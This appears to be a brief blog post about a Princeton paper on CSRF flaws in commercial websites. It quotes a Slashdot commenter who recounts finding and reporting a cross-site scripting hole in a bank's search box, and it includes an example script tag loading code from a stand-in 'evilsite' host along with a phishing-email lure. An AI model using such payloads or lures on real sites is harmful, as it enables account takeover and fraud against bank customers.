Princeton researchers released a research paper yesterday which documents Cross-Site Request Forgery vulnerabilities in 4 well known commercial websites (ING Direct, NY Times, Youtube, and Metafilter). It makes for interesting reading.
This is now being discussed on Slashdot.
My favourite comment so far…
by karmatic (776420) on Tuesday September 30, @02:06AM (#25201899)
This really isn’t that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.
So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.
So, with a simple link to a search for something like <script src=”http://evilsite.tld”>, I could take complete control over someone’s bank account. This would be easy to pull off with an email saying something like “We have detected suspicious activity; click here to log on to wellsfargo.com”. It really would take them to wellsfargo.com, and they could log in. You don’t need a user/password if you control the browser.
I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn’t excuse that 1) they should know better, and 2) if you’re going to check anything, it should be the one form that’s on every page.
Comments are closed.